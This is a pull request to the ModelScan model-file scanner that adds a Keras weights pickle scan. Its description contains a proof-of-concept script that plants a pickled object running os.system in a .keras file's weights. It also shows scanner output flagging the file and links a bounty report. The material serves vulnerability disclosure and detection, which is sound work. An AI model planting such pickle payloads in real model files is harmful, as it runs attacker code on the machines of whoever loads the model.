### PR TITLE
feat: support model.weights.npz pickle scan in .keras file

### DIFF
--- a/modelscan/scanners/__init__.py
+++ b/modelscan/scanners/__init__.py
@@ -9,4 +9,4 @@ from modelscan.scanners.saved_model.scan import (
     SavedModelLambdaDetectScan,
     SavedModelTensorflowOpScan,
 )
-from modelscan.scanners.keras.scan import KerasLambdaDetectScan
+from modelscan.scanners.keras.scan import KerasLambdaDetectScan, KerasWeightsPickleScan

--- a/modelscan/settings.py
+++ b/modelscan/settings.py
@@ -37,6 +37,10 @@ DEFAULT_SETTINGS = {
             "enabled": True,
             "supported_extensions": [".keras"],
         },
+        "modelscan.scanners.KerasWeightsPickleScan": {
+            "enabled": True,
+            "supported_extensions": [".keras"],
+        },
         "modelscan.scanners.SavedModelLambdaDetectScan": {
             "enabled": True,
             "supported_extensions": [".pb"],


### PR DESCRIPTION
Hi, I submitted a Keras sample on Huntr that was ignored by ModelScan, and I have written code to support the detection of this sample.

evil model poc:
```python
import zipfile
import pickle
import tensorflow as tf
from keras.src.saving.saving_lib import save_model
def build_keras_model(path):
    model = tf.keras.Sequential()
    model.add(tf.keras.layers.Input(shape=(1,)))
    model.add(tf.keras.layers.Dense(1))
    model.compile()
    save_model(model,path,weights_format="npz")

build_keras_model("./model.keras")
class array(object):
    def __reduce__(self):
        return (os.system,('id',))

with zipfile.ZipFile('./model.keras', 'a') as zf:
    with zf.open('model.weights.npz', 'w') as f:
        pickle.dump(array(), f)

import keras
keras.models.load_model('./model.keras')
```

result:
```bash
/Users/user/Library/Caches/pypoetry/virtualenvs/modelscan-Nl8ILvHF-py3.12/bin/python -m modelscan scan -p /Users/user/Documents/LLM/ModelPoisoning/model.keras 
No settings file detected at /Users/user/Desktop/modelscan/modelscan-settings.toml. Using defaults. 

Scanning /Users/user/Documents/LLM/ModelPoisoning/model.keras using modelscan.scanners.KerasLambdaDetectScan model scan
Scanning /Users/user/Documents/LLM/ModelPoisoning/model.keras using modelscan.scanners.KerasWeightsPickleScan model scan

--- Summary ---

Total Issues: 1

Total Issues By Severity:

    - LOW: 0
    - MEDIUM: 0
    - HIGH: 0
    - CRITICAL: 1

--- Issues by Severity ---

--- CRITICAL ---

Unsafe operator found:
  - Severity: CRITICAL
  - Description: Use of unsafe operator 'system' from module 'os'
  - Source: /Users/v/Documents/LLM/ModelPoisoning/model.keras:model.weights.npz

--- Skipped --- 

Total skipped: 3 - run with --show-skipped to see the full list.
```

[Keras file backdoor that modelscan cannot check out in keras_native](https://huntr.com/bounties/d901a4d1-cc66-4c7f-9071-db24d46c6888)
